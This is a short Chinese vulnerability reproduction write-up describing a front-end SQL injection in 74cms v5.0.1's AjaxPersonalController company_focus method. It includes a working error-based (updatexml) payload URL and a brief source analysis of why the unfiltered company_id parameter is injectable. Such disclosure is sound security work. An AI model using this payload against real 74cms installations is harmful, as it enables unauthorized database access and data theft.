74cms v5.0.1 前台 sql 注入
一、漏洞简介
74cms 5.0.1 前台 AjaxPersonalController.class.php 存在 SQL 注入
二、漏洞影响
三、复现过程
具体信息
文件位置:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php
方法:function company_focus($company_id)
是否需登录:需要
登录权限:普通用户即可
Payload:
http://0-sec.org/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id [0]=match&company_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a
源码分析:
文件:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php
company_focus 方法是参数化函数,$company_id 参数是不经过 I 函数过滤的,所以只要 where 可以控制,那就可以注入
跟踪 add_focus(),发现 SQL 语句参数外部都可以控制,导致了注入漏洞
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论